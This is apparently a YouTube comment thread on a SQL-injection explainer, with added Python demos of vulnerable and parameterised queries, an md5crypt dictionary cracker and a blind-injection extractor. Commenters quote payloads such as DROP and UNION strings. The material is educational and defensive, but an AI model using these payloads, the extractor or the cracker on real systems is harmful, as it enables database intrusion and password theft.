Well, if he put it up somewhere, it could be taken down pretty easily in seconds: someone drops all tables, and voila, you can't do anything anymore. This is like putting a bottle out on the street for everyone to break: if someone breaks it first, then no one else can do it anymore because it's already broken.
Yeah, I realized very soon after posting that comment that it would have to be "refreshed" very often, or done so that it doesn't break for everyone, and basically would be a pain in the ass to do.
Usually you need to find out what type of hash they use. Then you could try a dictionary attack. Have a program try each word until the hashed value = the one you got.
I think you're misunderstanding what salting does: you can reverse lookup a hash by having a list of hashed common words/used passwords, lists of billions upon billions of possible passwords... what salting does is change each hash with a "salt". So having two of the same passwords would produce two different hashes, thus making reverse lookup a less likely decryption method.
Maybe the best thing to do is to ignore the comment. Though a better way of dealing with it is, maybe, to thank that "basic" guy for the work he is doing.
With the search engine, another way to prevent it is to give every product a tag and give the users the impression that they can write whatever they want in the search engine, while in reality they can actually only pick from predetermined terms. So, any SQL injection would be useless there. Of course this would require more effort though.
I guess it would work, but it would make the search engine much less accurate. Either that or you'll be writing 300 tags for every item. It also can't work in every search box; what if you're searching for a student by name, or a movie?
How to avoid jail: "I've given myself the permission"
Officer, I swear what I did wasn't illegal, I gave myself permission to rob him!
@@elisttm ok ur free
XDDD
@@elisttm this reads like a privilege escalation exploit lol
I'm using it
...what is illegal? Running an SQL attack or making shitty web apps? 'Cause my real name is "'; DROP table users; SELECT '"
Both.
releasing the information is illegal.
attacking someone without their permission is illegal by law
making shitty apps is illegal by community
Making your application insecure towards attacks and putting your users' sensitive information at risk of being stolen and released is illegal.
@jan harald: What is "illegal by community" supposed to mean?
I wonder if you could change your legal name to that.
the intro had "" and the outro ""... smart... love the attention to detail
What does that mean?
oh now that makes sense :D Thanks
Being the pedantic developer I am, it's more like XML since HTML doesn't support a tag.
What are u doing here if u don't know that?? lol
@@sirturnables learning.
imagine not giving yourself permission to do this on your own website and then you sue yourself, win the lawsuit and then land in prison
Well, at least you would be able to win your own money. Thats more than what can be said for some married / divorced folks.
You’re pretty damn right m8
mmmMM the court fee, and if you have 1000 IQ your lawyer takes about 30%
Then become mr robot
Write it off as a tax deduction.
Decades ago, my brother named his bowling team "select *". This was in the early days of computers, so there wasn't modern security. The bowling alley printed the statistics, and when his team arrived, the employee presented an entire ream of paper and demanded they choose a different name.
Hehehe... funny. It's like the first Unix systems where you couldn't have a user named "Ed".
@@bsvenss2 Would it start the editor?
@@karldavis7392 it would lol
Me: Can I SQL Injection Attack your website
Me: Sure
That's what he did
Imagine he has schizophrenia and files a lawsuit against himself.
Or simply changes his mind.
*Mr. Robot intensifies*
😂
I love how he explains things non-pretentiously. It seems a lot of people in the computing field really like to think they're better than everyone else.
Prince Benny it’s usually not their fault.
Having worked with Tech Mobs for the Gold Coast commonwealth games, it’s just how IT dudes are and there is actually a job for people to take what the IT guy says and explains it to the project manager in a way that makes sense.
Yeah he's a great teacher too
Or with a foreign accent so heavy you can't even tell they are speaking English.
Yeah we do 😎
Yes we are
Thank you Peter Parker
He's the cool version of Peter Parker, from Spiderman 3
Underrated post
I thought I was the only mofo thinking he looked like Peter Parker from Spider-Man 😂
Or Frodo from The Lord of the Rings
FRODO!
Alright YouTube, this has been in my recommended for 2 years now, I'll watch it, you win.
Underrated
Interesting and informative, but the other guy is almost as basic as "So, what's that in front of you? Is it a computer?"
lowkey joke
You just wasted 2 years
@@sachinfulsunge9977 hahaha
The interviewer thought the text editor was already the hacking part
I noticed his excitement as well.
I loved when he nervously asked...so where are u typing that now....as if the whole world was going to blow up >^
you know he probably knows but he just asks for the content right?
He knows
at least he's willing to learn
Imagine naming your child "LIKE'%' UNION SELECT * FROM TABLEBASE" so that when they register its name, you'll get the information on all of the country's database
Travis Petit problem is, you should rather imagine that names of people could contain something other than letters (numbers and symbols)
Why is PHP better than Python please?
^^^^^^^^^^
US government sites use Drupal which uses PHP, so US government actually uses PHP
my birth name is actually ':-- DROP DATABASE
This is a very well done demonstration! I liked being able to see how it worked in an actual example.
Someone ran one of those scripts on my site to try to hack my database a couple years ago. The only thing it helped me realize is that I needed stronger spam protection, because it left thousands of failed injection comments on one of my pages, haha.
That sounds more like xss than sql injection
You need some of that htmlspecialchars(), a stripslashes() and str_replace()
htmlspecialchars() for the output as XSS protection.
In the case of PHP & MySQL it would be mysql_real_escape_string() against SQL injections in quoted values.
But people shouldn't think they would be safe when just using these functions. Someone can do an SQL injection without using any control chars at all if you didn't put quotes around the variable in the query: for example "SELECT * FROM posts WHERE postId = $postId"... the value of $postId could just be "1 UNION (SELECT 1, 2, 3)-- " without any quotes.
In this case you would be safe with casting the variable to an int, but best practice in general is using prepared statements.
meh, forgot about the ; in the example injection - but you get the point...
use prepared statements / stored procedures :-)
No, it is a SQL injection attempt, not an XSS attack, the hacker was using the comments form as a gateway to the database, just like Michael in the video used the search box to send malicious queries. The difference is a comments form will store those requests as comments while a search box doesn't store search queries.
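An added example, not from the video or from anyone in this thread, that shows both injection contexts the thread argues about: the quoted search box from the video and the unquoted numeric id where escaping quotes buys nothing. Python's sqlite3 stands in for the PHP/MySQL site; the table names, product rows and the "hash" strings are constructed for the demo.

```python
import sqlite3

def make_db():
    """Constructed stand-in for the video's shop: products the search box is
    meant to query, and a users table it was never meant to reach."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price REAL);
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO products VALUES (1, '7mm nails', 2.50), (2, 'hammer', 9.99);
        INSERT INTO users VALUES (1, 'joe', 'h4sh-of-joe'), (2, 'admin', 'h4sh-of-admin');
    """)
    return conn

# --- vulnerable: user input is pasted into the SQL text ----------------------

def search_vulnerable(conn, term):
    """Quoted context. A single quote in `term` closes the string literal and
    the rest of the input is parsed as SQL, exactly as in the video."""
    sql = "SELECT name, price FROM products WHERE name LIKE '%" + term + "%'"
    return conn.execute(sql).fetchall()

def product_by_id_vulnerable(conn, product_id):
    """Numeric context, no quotes at all. Escaping quotes does nothing here,
    because the attacker never needs one."""
    sql = "SELECT name, price FROM products WHERE id = " + str(product_id)
    return conn.execute(sql).fetchall()

# --- fixed: values travel separately from the SQL text -----------------------

def search_safe(conn, term):
    """Prepared statement: the driver binds `term` as a value, so a quote
    inside it is only ever a character, never a control structure."""
    sql = "SELECT name, price FROM products WHERE name LIKE ?"
    return conn.execute(sql, ("%" + term + "%",)).fetchall()

def product_by_id_safe(conn, product_id):
    """Cast to int (the thread's suggestion) and bind it; anything that is
    not a number is rejected outright instead of reaching the database."""
    try:
        pid = int(product_id)
    except (TypeError, ValueError):
        return []
    sql = "SELECT name, price FROM products WHERE id = ?"
    return conn.execute(sql, (pid,)).fetchall()

if __name__ == "__main__":
    conn = make_db()
    quoted = "' UNION SELECT username, password FROM users -- "
    numeric = "1 UNION SELECT username, password FROM users"
    print("vulnerable search:", search_vulnerable(conn, quoted))
    print("vulnerable id    :", product_by_id_vulnerable(conn, numeric))
    print("safe search      :", search_safe(conn, quoted))
    print("safe id          :", product_by_id_safe(conn, numeric))
```

Both vulnerable functions hand back the users table alongside the products; both safe ones treat the same payloads as a product name nobody has and return nothing. The cast alone would also stop the numeric case, but binding the value is the habit that covers every context at once.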
The hacking videos are the best and most interesting for me as comp science student. Keep them coming!
Just wait until you learn MySQL and Javascript. Then you'll be able to learn some very interesting things.
BlackenGames lol, I can program in over 20 languages, including those two. The point is not to learn them, but to learn against them. Possible weaknesses you have to remember when programming.
>Javascript
When I'm feeling like a masochist perhaps.
Blaze I really hate Javascript, but you should try typescript. I have made my peace with javascript that way
SuperManitu1 Then you should be able to exploit things easily.
I don't know how to program in a lot of languages. Only 2 and I know how to do some nice exploits.
It’s crazy how different my understanding of this video is since the first time I watched it. I watched it back in high school, now I’m halfway through a university degree and have taken web development courses... Funky.
Got the same feelings haha
i feel attacked
Just came back after 5 years and I'm second year into IT
This is the best explanation of SQL injection video ever. I've recommended it to a non-technical friend and he got the info-sec job.
Instructions unclear, NSA is outside my house.
😂😂😂
John Doe FAV hahahahaa
😂😂😂
WTF HOW DID YOU GET NSA OUTSIDE YOUR HOUSE OBVIOUSLY YOU UNDERSTOOD THE INSTRUCTIONS ARE YOU IN PRISON NOW?
blackham7 wooosh
So the best defense is to disable the "Search" box
Only criminals need search boxes.
The best defence is to take down your own website, destroy your computer, isolate yourself from technology & civilisation and go live in the woods.
No client can't hack you if you have no clients #LifeHack
@@saeedbaig4249
Nah, silly lol Just ban "UNION" from your search box...
From memory it's possible to use your browser search bar to run an SQL query
I made a website many years ago, and obviously made sure SQL injection wasn't possible, and I also logged stuff, and I did see some people trying to do SQL injection on my website.
Please give me the website address and permission to practice a pen test
@@211212112 This was well over 10 years ago. That website no longer exists.
anti/HUMAN Designs :(
Okay RUclips, I'll watch it. Recommending it to me for years.
The whole Computerphile series is just great. There is much that I can only learn here, although I speak only moderate English.
Your enthusiasm and your fascination for the topic make even a slightly boring topic stay interesting.
And that with every clip.
I thought I loved Scott. Then I discovered this man, the man that doesn't pronounce SQL like Sequel. He's brilliant
oh snap i've been pronouncing it incorrectly
Us in the UK don't tend to pronounce it "sequel"...
@@jackrogers1115 Well isn't Tom Scott from the UK, though? You see, he's the one in question who tends to do so.
@@13am22 what
In the UK, we tend to say S Q L, not sequel. That's what I'm saying. And yes, he's from the UK.
I always struggled with some parts of this. But I finally understand how it works, so I'd have to say this is probably the best explanation of SQL injections I've ever come across. Thanks
This guy is by far the best on this channel. Especially with his practical examples!
This is defense against the dark arts for Computer Science
OKAY RUclips I FINALLY WATCHED IT! This video has been in my recommended for years now.
Useful to see as this does work on my website.
Baldeep Birak so what website do you run? Asking for a friend lol
Cheeky.
Hey now, let's none of us go Ball Deep on Baldeep.
mind if I take a look on your website?
@@Rosson311 But even as a joke you shouldn't try it, because when the police are at your door it won't hold, honestly. Like, if I come to your house with a knife and you call the police and I tell them 'oh, it was just a joke, for fun, didn't mean to do anything', not so sure someone will bite that even if it were the truth. So yeah, don't even think of trying it just to see if it works. You would be the dumbest hacker in that jail yard.
That's why I use prepared statements everywhere, even when I get something from my own database, and do a query on something else.
you gave yourself permission? is that in writing? is it notarized? who knows, maybe you'll change your mind and press charges on yourself!
I'm only halfway through the video. It's easy to understand what he is trying to say due to those practical examples, presented in a simplified way. It's half a decade old and still one of the best videos to watch on this topic.
Imagine explaining that to inmates in jail: "I... I... put the wrong text in a database on purpose".
Inmates be like: "Somebody get me a restriction order, you ain't coming 5 cells away from me, what is wrong with you!"
Funny haha
This guy is quality, I could listen to him all day
A 2rd degree attack would be me naming my children ";--"
LOL I mistyped 2 instead of 3 hahaha
Bobby Tables would be proud of you!
Little Bobby Tables!! :)
2rd ? "secord" ? :))
CuZoSky
twoerd
user name consisting of SQL? must be Little Bobby Tables
rchandraonline I know of that site, but this is a full in depth explanation as to exactly how it works.
I will name my son as Little Bobby Tables
I suddenly remember a man named "null"
Where's the "Students" table?
Oh, I love that comic. "Oh little Bobby Tables, we call him."
I never understood SQL injection until I watched this video... bow to you... 🙇
One of my accomplishments at my first job was rewriting all of our (then) inline SQL queries and stored procs in C# to implement SQL injection prevention! It was a lot of fun :) And very rewarding when I was done
Now this is art. I can totally imagine people doing stuff like this because it's fun. Like chess.
Juan2003gtr why are you calling him a noob?
Like gambling.
I learnt more from this video than my entire DBMS coursework.
The password for user Joe is 'administrator'.
./john /vagrant/x --show
?:administrator
1 password hash cracked, 0 left
What was the salt?
The whole hash is
$1$V32.4G/.$0PKnjhXYUmYLJZZ8vEt/b/
so i guess the salt is 'V32.4G/.'. I'm not familiar with the format of md5, but in bcrypt that would be the salt.
vinkuu So, essentially, if you get into the database, you can use the salt that is with the password to crack it by brute forcing it?
Yes, correct. And that is the reason md5 is considered a bad choice of hashing algorithm to use for hashing passwords. It's very fast to brute force md5 hashes compared to e.g. bcrypt with a cost setting of 15. It directly equates to the cost (€) of the brute force cracking setup.
Or just type in administrator??????
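The thread asks what the salt in `$1$V32.4G/.$0PKnjhXYUmYLJZZ8vEt/b/` is and how John the Ripper got from that string to a password. This added example (my code, not the video's and not John's) parses the modular-crypt-format string, re-implements the `$1$` md5crypt scheme that format denotes, and runs the dictionary attack described a few comments up. The wordlist is constructed; the hash constant is the one quoted in the thread, and whether the last line recovers "administrator" depends on it having been transcribed correctly there.

```python
import hashlib

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

def parse_mcf(hash_str):
    """Split a modular-crypt-format string '$id$salt$digest' into its fields.
    The salt is stored in the clear: it defeats precomputed tables, not guessing."""
    _, ident, salt, digest = hash_str.split("$")
    return ident, salt, digest

def _to64(value, n):
    """md5crypt's own base-64 variant: n characters, low six bits first."""
    out = ""
    for _ in range(n):
        out += ITOA64[value & 0x3F]
        value >>= 6
    return out

def md5crypt(password, salt):
    """Re-implementation of the classic $1$ md5crypt (FreeBSD crypt-md5.c)."""
    pw, salt, magic = password.encode(), salt.encode()[:8], b"$1$"
    ctx = hashlib.md5(pw + magic + salt)
    alt = hashlib.md5(pw + salt + pw).digest()
    pl = len(pw)
    while pl > 0:                      # mix in alt, 16 bytes per 16 bytes of password
        ctx.update(alt[:min(16, pl)])
        pl -= 16
    i = len(pw)
    while i:                           # one byte per bit of the password length
        ctx.update(b"\0" if i & 1 else pw[:1])
        i >>= 1
    final = ctx.digest()
    for r in range(1000):              # fixed 1000 rounds: slow in 1994, trivial on a GPU
        c = hashlib.md5()
        c.update(pw if r & 1 else final)
        if r % 3:
            c.update(salt)
        if r % 7:
            c.update(pw)
        c.update(final if r & 1 else pw)
        final = c.digest()
    order = [(0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)]
    enc = "".join(_to64((final[a] << 16) | (final[b] << 8) | final[c], 4)
                  for a, b, c in order)
    enc += _to64(final[11], 2)
    return "$1$" + salt.decode() + "$" + enc

def dictionary_attack(hash_str, wordlist):
    """What 'john' does in the thread: hash each candidate with the leaked salt
    and stop at the first one that reproduces the stored string."""
    ident, salt, _ = parse_mcf(hash_str)
    if ident != "1":
        raise ValueError("only $1$ (md5crypt) handled here")
    for word in wordlist:
        if md5crypt(word, salt) == hash_str:
            return word
    return None

if __name__ == "__main__":
    LEAKED = "$1$V32.4G/.$0PKnjhXYUmYLJZZ8vEt/b/"     # the hash quoted in the thread
    WORDS = ["password", "123456", "letmein", "administrator"]  # constructed wordlist
    print("salt   :", parse_mcf(LEAKED)[1])
    print("cracked:", dictionary_attack(LEAKED, WORDS))
```

Note what the salt does and does not do here: two users with the same password get different strings, so a precomputed table is useless, but once the row is leaked the attacker simply uses the stored salt and pays 1000 MD5 computations per guess. bcrypt at cost 15 charges 2^15 rounds of a far slower primitive per guess, which is the cost difference the reply above is pointing at.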
Reminds me of the days when I had to 'recover' lost wordpress credentials for customers. Luckily web security has gotten much better but this is still a very valid video.
WordPress has never been secure in any way, and it should never be used commercially
this was one of the most interesting videos I have seen in a while. gotta watch more now
Dude this guy is crazy I love watching vids with this dude
Would love to see a video on second order SQL injections!
You don't go to jail if you don't get caught.
Iceborn Gauntlet probably you.
Chase Brower no, not just me. EVERYONE.
Frank zapper
you don't go to jail if you never try to learn this stuff. * makes the meme face *.
That's what Hillary told me.
Subscription at first video :) This is the best explanation of an SQL injection that I've ever heard. Pretty sure that even non-coders would understand
Quantity in stock: A D M I N
Product name: G E O R G E
That's why you use PDO and bind requests. Also don't forget to sanitize user input before the query
WPF in C# 2010 Book on the background - Busted!
alert("hello world");
-I'm in.
Alternative title: Tyrell Wellick runs an SQL Injection attack.
XD
That nearly finished Rubik's cube on his desk is playing havoc with my OCD
here to remind you of that unfinished cube lol
😭
Thanks! This video explains it better than my database subject lectures.
Just to clarify: It's not a malformed query. You're actually getting outside of the query that the website wants you to. Basically, you get to create your own little query which is pretty terrible cause then some dude can query for everyone's passwords.
"Ah, I'm sure my website will be fine."
*checks it*
"ohno"
actually underrated 😂
Oof 😅
SurprisedPikachu.jpg
"anyway..."
Felt like I was listening to an SQL injection tutorial as presented by James Acaster. And loved every second of it of course
Amazing how this was posted in 2016 and these were concerns I had to address in 1996. Filtering, stored procedures and permissions are your friend.
I really love how Mike stepped up his game lately. Easily one of my regulars on Computerphile, keep it up!
I got 15 years for sql injection one time
absolute mad man
but did you though?
I got executed for MITM attack.
I got two days of torture for changing the input type from password to text
I got sentenced to lethal injection for typing on the console
@@sieghart0515 I did a year and a half for getting on my teacher's computer, taking a screenshot of his desktop, saving that screenshot as a jpeg, then making that his desktop background... then removing his shortcuts and lowering his taskbar... so no matter how much he clicked, he got nowhere.
It’s 2022 and still a valid issue!!!
I had known and understood what sql injection was previously, but I had never heard of blind sql attacks and using database-specific syntax in order to obtain information on the underlying database. Very informative video
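The comment above mentions blind SQL attacks and database-specific syntax, which the video only touches on. This added example (mine, not the video's) shows the mechanics: a page that never echoes rows, only "found" or "not found", still leaks the whole users table one bit at a time. Python's sqlite3 again stands in for the PHP/MySQL site, and the schema, rows and the stored "hash" are constructed for the demo.

```python
import sqlite3

def make_db():
    """Constructed stand-in for the shop in the video."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT);
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO products VALUES (1, '7mm nails'), (2, 'hammer');
        INSERT INTO users VALUES (1, 'joe', 's3cr3t-h4sh');
    """)
    return conn

def product_exists(conn, term):
    """The vulnerable page, blind variant: it never shows rows, it only says
    whether the search matched anything, so a UNION gets the attacker nothing."""
    sql = "SELECT COUNT(*) FROM products WHERE name LIKE '%" + term + "%'"
    return conn.execute(sql).fetchone()[0] > 0

def ask(conn, condition):
    """Turn an arbitrary SQL boolean into one yes/no answer from the page:
    'hammer' always matches, so the outcome is decided by `condition` alone."""
    return product_exists(conn, "hammer' AND (" + condition + ") -- ")

def blind_extract(conn, expr, max_len=64):
    """Recover the value of SQL expression `expr` one character at a time.
    unicode() and substr() are SQLite's spellings; MySQL would need
    ASCII()/SUBSTRING(), which is why fingerprinting the database comes first."""
    length = 0
    for n in range(1, max_len + 1):
        if ask(conn, f"length({expr}) = {n}"):
            length = n
            break
    value = ""
    for pos in range(1, length + 1):
        lo, hi = 32, 126                      # printable ASCII
        while lo < hi:                        # binary search: 7 questions per character
            mid = (lo + hi) // 2
            if ask(conn, f"unicode(substr({expr}, {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        value += chr(lo)
    return value

if __name__ == "__main__":
    conn = make_db()
    print("database:", blind_extract(conn, "sqlite_version()"))
    print("joe hash:", blind_extract(conn, "(SELECT password FROM users WHERE username = 'joe')"))
```

Every question is an ordinary-looking search for "hammer" with a condition bolted on; the page answers each one honestly. Tools such as sqlmap automate exactly this loop, and the fix is the same as for the visible case: bind the search term instead of concatenating it.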
the first person to put the word 'an' before consonants like 's' that start with a vowel. Thank you. An 'r', people. Say AN 's', AN 'h', AN 's', etc. I know I'm not the only one.
Thank you RUclips for suggesting this video to me after my DBMS exam... would've done great if I had watched this video
The most scary fact about this is that it's still an issue in 2016. I did this kind of stuff 15 years ago and back then I already thought "this is way too easy". The bad news was that there were no such things as prepared statements, so you really had to do all the work with escaping.
I used to work for a consulting company and you'd be surprised how shitty the majority of companies are at protecting your data. Mostly smaller businesses, but even some of the large ones lack basic security measures. It was pretty eye opening.
"It should have used that single quote as a character, not as a control structure" damn that is really interesting and cool... Please (universe) give me the determination to get through HTML/CSS/JS/SQL... It just seems so neat and handy...
Just perfect!!! Rather than talking about how it's done, show how it's done.
Back when I was a "code monkey" AKA programmer, I was once officially admonished by my supervisor for wasting time putting in error trapping. "If the customer wants that, they can pay for it" was what he told me...
That company is still around today - I looked them up. Apparently one of their core values is "Enthusiastic, Passionate and Fun" but the fact is, crappy programming is the norm, not the exception.
When putting together a SQL driven site, I put all text input variables through a function which filters out all potentially hostile characters and replaces them with something which cannot be interpreted as SQL code. It could also be possible to get the PHP to check for multiple attempts to submit SQL injections. One or two could be accidental, but more than that could be viewed as an attack, so I could make the PHP block all traffic from that IP for an hour, or return some decoy tables, or even a fake page warning the hacker that a virus is being uploaded to their computer, complete with a progress bar :)
If you're still learning PHP, SQL and all that stuff and didn't already - please have a read on PDO and prepared statements. It's the "new" easy way of dealing with everything. :)
make it return what they would want to see, but the wrong information. a fake error or a fake full table
What was the price for the 7mm nails? I'm re-upholstering a chair currently and think 8mm would be too long.
Thanks.
I like how the interviewer initially couldn't get around the fact that all the instructor was doing is just writing out the "code" in a text editor.
Ha! I encrypted user names and passwords back in 1992! The encryption wasn’t very sophisticated, but the bad guys didn’t know that.
I feel so validated!
This is why we should use PreparedStatements in PHP, JSP, Servlets, C# and ASP.. :)
That wasn't always a thing before, sadly. As of today, it's basically the only way to go. :)
Me: Going through lecture slides to pass my SQL exam.
You: Playing black magic with sql query.
"; DROP ALL DATABASES; --
Thats bad
:D
OMG...
Only if the account has been granted DROP permissions. For a site that just shows records it should only be created and given SELECT permission.
+Chris Ellis
Do you really think someone who isn't going to escape user input, would think about that?
Because I honestly don't.
this explanation is so far superior to the other guy's coffeeshop explanation. The visualization is very important.
I learned more about databases in this one video than I did during a semester long class in Uni about databases.
15:15 "Thank you for saving us some time." - Malicious people.
the illegal part of this is having an unsolved cube on your desk with super easy PLL case :c
Hint: Just use incognito mode in your browser to never get caught. You're incognito when you use it so they will never find out who you are.
Easy solution.
Ur joking, right? :)
@@romankrivocheev4434 Yes. But i saw some people in the wild who actually think that way :D
Or just use Tor
@@ItsAstie would that work tho?
On a serious note does using free vpn work?
I love this channel, some videos I understand, and some I have no ******* idea what they are talking about. These guys are super epic and advanced. I'm an uber beginner LOL. Been learning the basics and enjoying it. Thank you for such incredible material, I really appreciate you guys, and of course, RUclips too is just simply awesome
That program you had was literally something I had to make for a class in web development. I think it was the PHP class. Thankfully, we also have a mandatory information security course I'm in now and learning about these. We did talk about making sure quotes don't get in, which is important.
As a SQL beginner this was super helpful, thank you.
This should be basic education at this point, I’m so pissed nobody was learning or teaching this in school
Depends on the school you were at.
Totally agree.
Fellow Sublime Text user
Amazing band
take my like hahahaha
I'm serious tho.
sublime text
Atom is better
just started doing a Cyber Security Course at college, enjoying your videos to supplement my learning :)
At one point, I created and maintained a server. You have to know how to crack your own system to know how to defend it. I launched campaigns against my server on a somewhat regular basis. Great explanation.
Insightful. Thank you for taking the time to go through it. Not a database guy but found it very interesting.
This is a weak attack; it can simply be prevented by escaping chars or by creating SQL stored procedures if you know how to use them.
Abbass: you're right! That crossed my mind too! :)
5:42 - this was the first time I dropped my jaw
This is actually an incredibly well explained bit of content. I know that it's probably not going to make sense to 80% of people, but if you know what is going on and you're just a bit new to all of this then it explains things in such a way that connects the dots for you. I wish I would have had this video at my fingertips 20 years ago lol.
Learnt about this in my computer science class today and now I feel like an absolute badass
As a learning web developer that uses php and sql all the time, this is pretty creepy. Luckily I learned to sanitize my queries early on, but I need to learn more about how hackers might attack a website.
Can you put this website somewhere out there on the internet? Because I'm SURE a lot of people watching this would love to try their own injections and have fun with it.
That would be pointless; the first injection could be a command to drop all tables, and then there would be nothing in the database and no fun for others.
You can download XAMPP and create a simple database like this and do all queries like that inside the web interface for phpMyAdmin on your own computer without even creating a separate website.
Well, if he would put it up somewhere, it could be taken down pretty easily in seconds: someone drops all tables, and voila, you can't even do anything anymore. This is like putting a bottle out on the street for everyone to break; if someone breaks it first, then no one else can do it anymore because it's already broken.
Yeah I realized very soon after posting that comment that it would have to be "refreshed" very often or just done so that it doesn't break for everyone and basically would be a pain in the ass to do.
Actually you can write your own script to do it. It's really just basic coding.
Check out hackthissite.org, they have some easy and some hard websites for you to hack into!
+Computerphile could you do a video on hashing/breaking hashes?
Coming soon - using a 4x Titan X GPU server ;)
Usually you need to find out what type of hash they use. Then you could try a dictionary attack. Have a program try each word until the hashed value = the one you got.
md5 :)
I think you're misunderstanding what salting does, you can reverse lookup a hash by having a list of hashed common words/used passwords, lists of billions upon billions of possible passwords...what salting does is change each hash with a "salt". So having two of the same passwords would produce two different hashes, thus making reverse lookup a less likely decryption method.
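The salting argument in this reply, as an added example (not code from the video or the commenters): a precomputed hash-to-password table recovers an unsalted hash of a common password but misses the salted one, and the same password salted twice gives two different hashes. SHA-256 from hashlib is used here; the password list and salts are constructed for the demo.

```python
"""Added example: why a per-user salt defeats a precomputed lookup table.
COMMON_PASSWORDS is a constructed stand-in for a leaked password list."""
import hashlib
import os

COMMON_PASSWORDS = ["123456", "password", "qwerty", "letmein", "hunter2"]


def hash_unsalted(password):
    return hashlib.sha256(password.encode()).hexdigest()


def hash_salted(password, salt):
    # The salt is stored next to the hash; it must be unique per user, not secret.
    return hashlib.sha256(salt + password.encode()).hexdigest()


def build_lookup_table(passwords):
    """Precomputed table hash -> plaintext, one entry per candidate password.
    This is what makes unsalted hashes 'reversible' in practice."""
    return {hash_unsalted(p): p for p in passwords}


def reverse_lookup(table, digest):
    """Return the plaintext if the digest is in the table, else None."""
    return table.get(digest)


def demo(password="hunter2"):
    table = build_lookup_table(COMMON_PASSWORDS)
    salt_a, salt_b = os.urandom(16), os.urandom(16)   # two users, two salts
    h_plain = hash_unsalted(password)
    h_a = hash_salted(password, salt_a)
    h_b = hash_salted(password, salt_b)
    return {
        # Unsalted: one dictionary lookup recovers the password.
        "unsalted_cracked": reverse_lookup(table, h_plain) == password,
        # Salted: the table was built without this salt, so it cannot match.
        "salted_cracked": reverse_lookup(table, h_a) is not None,
        # Same password, different salts -> different stored hashes.
        "same_password_same_hash": h_a == h_b,
    }


if __name__ == "__main__":
    print(demo())
```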
Is this the actual Michael from the video? If it is, I'm happy you're reading the comments. These videos have been quite refreshing on Computerphile.
I never sanitize form input. Livin' on the edge!!!
that's why you use frameworks that do sql injection prevention for you, or simply just escape the input you throw to your database.
Interesting and informative, but the other guy is almost as basic as "So, what's that in front of you? Is it a computer?"
What's that, a text editor? And the letters that you type on this key device appear on it? Fantastic!
Maybe the best thing to do is to ignore the comment. Though a better way of dealing with it is, maybe, to thank that "basic" guy for the work he is doing.
@@mbarekzacri4973 he could do better, that's what the comments want to say
Are you talking about Tom Scott?
He asked it for the audience. He runs this channel. Obviously he would know about Sublime Text.
With the search engine, another way to prevent it is, give every product a tag and give the users the impression that they can write whatever they want in the search engine, while in reality they can actually only pick from predetermined terms. So, any SQL injection would be useless there. Of course this would require more effort though.
I guess it would work, but it would make the search engine much less accurate. Either that or you'll be writing 300 tags for every item.
It also can't work in every search box, what if you're searching for a student by name, or a movie?
Yep, this is what we have SQL parameter solutions for, in many programming languages. To prevent that trouble.
I think this guy is great. Consider yourself with him teaching you hands on in some real lab/ classes. Better than other show offs on RUclips.
I actually wanted to write a bit of fanfic about a character SQL-injecting an A.I. I'm doing RRRRESEARCH! :L